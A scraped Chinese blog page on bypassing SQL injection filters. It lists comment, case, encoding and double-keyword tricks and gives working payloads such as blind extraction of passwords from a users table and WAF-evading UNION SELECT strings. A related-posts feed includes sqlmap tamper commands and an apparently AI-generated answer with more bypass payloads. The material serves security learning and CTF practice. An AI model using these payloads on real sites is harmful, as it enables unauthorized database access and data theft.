sql注入过滤与绕过

最新推荐文章于 2025-06-29 16:19:58 发布
原创 最新推荐文章于 2025-06-29 16:19:58 发布 · 1.2k 阅读 · 4 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#sql

在一些网站,管理员会通过一些正则表达式来使过滤一些语句
此时,就要通过一些绕过方法来绕过过滤进行查询。

一、通过注释符绕过

注释符 # //
通过在关键词的中间加入注释符,使关键词不被识别
如 select 改为 se//lect

二、通过<>绕过

如 select 改为 sel<>ect

三、通过改变大小写绕过

四、如果and or被过滤

可以将and 用&& 替换
or 用 || 替换

五、通过重复关键词绕过

六、通过url编码绕过

七、等价函数与命令绕过

函数或变量

hex()、bin() ==> ascii()
sleep() >benchmark()
concat_ws()>group_concat()
mid()、substr() ==> substring()
@@user ==> user()
@@datadir ==> datadir()
举例:substring()和substr()无法使用时:?id=1+and+ascii(lower(mid((select+pwd+from+users+limit+1,1),1,1)))=74 
或者:
substr((select ‘password’),1,1) = 0x70
strcmp(left(‘password’,1), 0x69) = 1
strcmp(left(‘password’,1), 0x70) = 0
strcmp(left(‘password’,1), 0x71) = -1

2021-09-01 网安实验-SQL注入-绕过UNION&SELECT过滤
时光隧道
09-01 4万+
关键代码为: 在MySQL中tab,空格,回车都可以隔断语句,那么我们就可以用使用/**/ 或() 或+ 代替空格,%0c =换页、%09 = 水平制表符、%0d = 回车、%0a = 换行。那我们试试 『id=12211%27+uniOn%09selEct%0d1,2,password%0dfrom%0dusers%0dwhere%0did=%272%27||%27』 成功了呢。很多不可见的空白字符都可以用哦,你可以试试。 ...
SQL 注入之 WAF 绕过
2301_77160226的博客
08-28 1711
SQL 注入攻击是一种严重的安全威胁,而 WAF 是防范 SQL 注入攻击的重要手段之一。然而,攻击者也在不断寻找方法绕过 WAF,从而成功实施 SQL 注入攻击。为了防范 WAF 绕过,我们需要采取持续更新 WAF 规则、多层面防御、安全培训和定期安全审计等措施,形成一个强大的安全防护体系,保护 Web 应用程序的安全。同时,我们也需要不断关注网络安全领域的最新动态,及时了解新的攻击技术和防范方法,以提高我们的安全防护能力。
SQL注入技术详解过滤绕过方法
Cyc1e的博客
11-07 2109
SQL注入攻击是严重的安全威胁,可能导致数据库数据泄露或篡改。使用参数化查询或ORM框架,避免直接拼接SQL语句。对用户输入进行严格过滤和验证,限制输入的格式和范围。定期更新依赖库,修复已知的安全漏洞。然而,攻击者可能通过编码、注释、拆分关键字等方式绕过简单的防护机制。因此,开发者应使用多层次的防御方法,并定期对应用进行安全测试。
sql注入——避开过滤
weixin_34072637的博客
09-19 325
有的时候,很容易受到SQL注入***的程序,可能会进行输入过滤,用来防止***者无限制的利用其中存在的设计缺陷。 唱出会删除或者净化一些字符,或者阻止常用的sql关键词。 我们通常有以下几种技巧,去避开这些过滤。 1,避免使用被阻止的字符,即不使用这些字符仍然达到***目的。 A,如果注入一个数字数据字段,就不需要使用单引号。 B,输入注释符号被阻止使用,我们可以设...
sql注入绕开过滤的常用方法
u012684933的专栏
03-05 7963
1. 使用注释,例如:     SELECT/*foo*/username,password/*foo*/FROM/*foo*/users     在mysql中甚至可以在关键字中间插入注释,例如SEL/*foo*/ECT username,password FR/*foo*/OM users 2. 避免使用关键词,例如:  select ename, sal from emp w
sql注入绕过union select过滤
aiquan9342的博客
01-11 957
# # # #WAF Bypassing Strings: /*!%55NiOn*/ /*!%53eLEct*/ %55nion(%53elect 1,2,3)-- - +union+distinct+select+ +union+distinctROW+select+ /**//*!12345UNION SELECT*//**...
SQL注入过滤限制绕过方法
weixin_30879169的博客
04-28 1303
突然想我们是否可以用什么方法绕过SQL注入的限制呢?到网上考察了一下,提到的方法大多都是针对AND“’”号和“=”号过滤的突破,虽然有点进步的地方,但还是有一些关键字没有绕过,由于我不常入侵网站所以也不敢对上述过滤的效果进行评论,但是可以肯定的是,效果不会很好…… 经过我的收集,大部分的防注入程序都过滤了以下关键字: and | select | update | chr | delete ...
SQL注入技巧之显注盲注中过滤逗号绕过详析
09-09
SQL注入是一种常见的网络攻击技术,攻击者通过构造特殊的SQL代码片段,利用Web应用程序数据库之间的交互漏洞来获取、修改或者删除数据库中的信息。过滤逗号是安全领域常见的一种防御SQL注入方法,因为SQL语句中...
深入了解SQL注入绕过waf和过滤机制
02-11
"深入了解SQL注入绕过waf和过滤机制" SQL 注入绕过 WAF 和过滤机制是一个非常重要的知识点,笔者将从以下几个方面对其进行详细的分析和说明。 首先,WAF(Web Application Firewall)的常见特征是指其具有审计...
2024年网络安全最新【Web安全】SQL各类注入绕过
2401_84281648的博客
05-03 718
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
SQL注入绕过关键词过滤的小技巧及原理(union select为例)
热门推荐
weixin_54848371的博客
09-22 1万+
本文以联合查询关键字union select为例讲解绕过关键词过滤的一些方法。之所以了解绕过,关键是发现sqlmap有时候真的是不靠谱,只能指定命令跑。有一些简单过滤很容易绕过却不能检测。虽然麻烦点,手工yyds~~。 1、大小写变种 UNION SELECT=>uNIon SElecT 选择几个字母变换大小写,可以绕过部分不太聪明的过滤器。在sql查询中是不区分大小写的所以查询语句正常执行 2、使用SQL注释 union select=>/**/UNION/**/...
sql注入解析(四)避开过滤
ncafei的博客
03-14 2003
上一篇: http://www.2cto.com/Article/201209/153279.html web应用程序会对用户的输入进行验证,过滤其中的一些关键字,这种过滤我们可以试着用下面的方法避开。 1、 不使用被过滤的字符: 比如注入一个数字数据,就不需要使用单引号;’ or 1=1–,如果注释字符被过滤,我们可以这样写 ‘ or ’1′=’1 。 2、 避免使用简单确认:
SQL 注入绕过过滤
最新发布
2401_82890055的博客
06-29 354
比赛时遇到一个登录页面,试了很多常规用户名和密码都登录不上。学过 Web 安全知识后,我猜测这可能是 SQL 注入题。随便输入单引号,页面报错了,这就说明存在 SQL 注入点。不过,当我尝试输入 union、select 这类常见的注入关键词时,发现都被拦截了,看来得想办法绕过过滤才行。这道题的核心就是绕过过滤。我们利用双写、内联注释打破限制,再靠 SQL 注入的报错特性,一点点把数据库里的信息挖出来。以后遇到关键词过滤,多研究研究数据库的特性,肯定能找到办法。
SQL注入---字符绕过
zhoutong2323的博客
04-10 3212
当网页源代码中出现如下代码后,常见的注释符号将无效,因此需要通过特殊手段进行绕过 上述代码中无法使用符号(#)或(--+)将后面的sql语句注释,因此需要通过特殊手段将后面多出的单引号闭合演示案例: 二.and 和 or 过滤绕过 过滤源代码 绕过手法 三.空格过滤绕过 过滤代码: 绕过手法: 在不同的环境中能够绕过的URL编码有所不同,因此需要多次尝试。演示案例:未使用URL编码注入前:符号被过滤 使用URL注入编码后 报错注入
随时补充SQL注入绕过
weixin_44722125的博客
05-13 966
做CTF题的时候才发现自己会的注入姿势太少了 专开一篇随时补充sql注入 1.绕过空格(注释符/* /,%a0):   两个空格代替一个空格,用Tab代替空格,%a0=空格: %20 %09 %0a %0b %0c %0d %a0 %00 /**/ /!/ 最基本的绕过方法,用注释替换空格: / 注释 */ 使用浮点数: select * from users where id=8E0unio...
SQL注入绕过
anlalu233的博客
10-18 703
注释符号绕过 大小写绕过 双写绕过 编码绕过 <>绕过 对空格的绕过 对or/and的绕过 对等号=的绕过 对单引号的绕过 对逗号的绕过 过滤函数绕过 ...
SQL注入实战:绕过操作
ting_liang的博客
01-27 3391
preg replace(mixed $pattern, mixed $replacement, mixed$subject):执行-个正则表达式的搜索和替换。id=1 && 1=1或者?可以利用网络中的开源的URL在线编码,绕过SQL注入过滤机制。1、大小写变形,Or,OR,oR,And,ANd,aND等-代码中大小写不敏感都剔除。3、利用符号代替--and --&& --or--|| 等。5、网站的每个数据层的编码统一,建议全部使用utf-8编码。
SQL注入过滤联合注入绕过技巧
lubiii_的博客
03-16 652
实际绕过需根据过滤规则灵活组合,通过逐步测试判断被拦截的关键点(如替换关键字、符号后观察回显变化)。熟悉数据库特性(如MySQL的。
sql注入过滤绕过
03-29
<think>好的,用户想了解如何绕过SQL注入防护机制的技术细节。首先,我需要回忆常见的SQL注入绕过方法,并确保回答准确。用户提到他们已经有了参数化查询、输入验证等防护措施的知识,现在需要绕过这些防护的技巧。 首先,常见的绕过方法包括编码绕过、注释符混淆、布尔盲注和时间盲注。编码方面,比如URL编码或十六进制编码可能被用来绕过简单的过滤。例如,用%20代替空格,或者用CHAR()函数代替字符。 然后是注释符的使用,比如用--或/* */来截断后面的查询,可能绕过某些过滤逻辑。有些系统可能过滤了常见的注释符,但可能忽略其他变体,比如使用#或者不带空格的--。 接下来是布尔盲注和时间盲注,这些技术不依赖错误信息,而是通过页面响应差异或延迟来判断注入结果。例如,利用AND 1=1或AND IF(条件,SLEEP(5),0)这样的语句。 另外,还有分块传输、HTTP参数污染等方法,利用WAF处理请求的差异来绕过检测。比如,通过多个相同参数传递恶意代码,或者将注入语句拆分到多个参数中。 需要提到工具如sqlmap的tamper脚本,这些脚本可以自动应用各种编码和混淆技术。例如,使用space2comment脚本将空格替换为注释。 同时,要注意引用用户提供的参考内容,特别是引用[4]中的sqlmap命令示例,说明工具在绕过中的应用。可能用户对实际操作更感兴趣,所以需要结合实例说明。 还要注意技术细节的准确性,比如不同数据库的差异,如MySQLSQL Server在注释和函数上的不同。例如,MySQL支持/*!50000 ... */这样的内联注释,可以用来绕过一些过滤。 最后,提醒用户这些方法仅用于防御测试,避免法律风险。确保回答结构清晰,分点列出方法,每个方法附上例子和技术说明,并适当引用提供的资料。</think>### 如何绕过SQL注入防护机制的技术细节 #### 1. **编码绕过** - **URL编码/十六进制编码**: 将关键字符转换为URL编码或十六进制形式,例如: - 空格用`%20`或`+`代替,或用`/**/`代替空格(适用于MySQL)[^3]。 - 单引号`'`转为`%27`,`SELECT`转为`SEL%45%43%54`(十六进制)。 - **Unicode编码**: 利用数据库支持的Unicode字符,如`%u0027`表示单引号。 - **双重编码**: 对已编码的字符再次编码,如`%2527`解码后为`%27`(即单引号)。 #### 2. **注释符混淆** - **内联注释**: 在MySQL中可用`/*!50000 ... */`绕过部分过滤,例如: ```sql SELECT/*!50000 user*/ FROM dvwa.users; ``` - **截断注释**: 使用`--`、`#`或`/* */`截断后续语句,例如: ```sql ' OR 1=1 -- ``` #### 3. **布尔盲注时间盲注** - **布尔盲注**: 通过页面响应差异判断条件真假,例如: ```sql ' AND (SELECT SUBSTRING(password,1,1) FROM users)='a ``` - **时间盲注**: 利用条件触发的延迟,例如: ```sql ' AND IF(1=1, SLEEP(5), 0) -- ``` #### 4. **分块传输参数污染** - **HTTP分块传输**: 将恶意语句拆分成多个请求块,绕过WAF的流式检测。 - **参数污染**: 提交多个同名参数,如`?id=1&id=2 UNION SELECT 1,2,3`,可能触发后端解析差异。 #### 5. **工具自动化绕过(如sqlmap)** - **Tamper脚本**: 使用sqlmap的`--tamper`参数自动混淆语句,例如: ```bash sqlmap -u "http://example.com?id=1" --tamper=space2comment,equaltolike ``` 该命令将空格替换为`/**/`,`=`替换为`LIKE`[^4]。 - **绕过WAF规则**: 结合`--random-agent`和`--delay`降低检测概率。 #### 6. **数据库特性利用** - **字符串拼接**: 如MySQL的`CONCAT()`函数: ```sql ' UNION SELECT CONCAT(username,0x3a,password) FROM users -- ``` - **动态执行**: 在SQL Server中利用`EXEC()`动态执行十六进制语句: ```sql ; EXEC('SELECT * FROM users') -- ``` #### 7. **二次注入** - 利用已存储的恶意数据触发注入,例如: 1. 注册用户名时输入`admin'-- `。 2. 后续查询时触发拼接漏洞: ```sql UPDATE users SET email='[email protected]' WHERE username='admin'-- '; ``` #### 防御建议(引用说明) 参数化查询仍是防止SQL注入的核心手段[^1],结合输入验证和WAF规则更新可提升防护强度。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值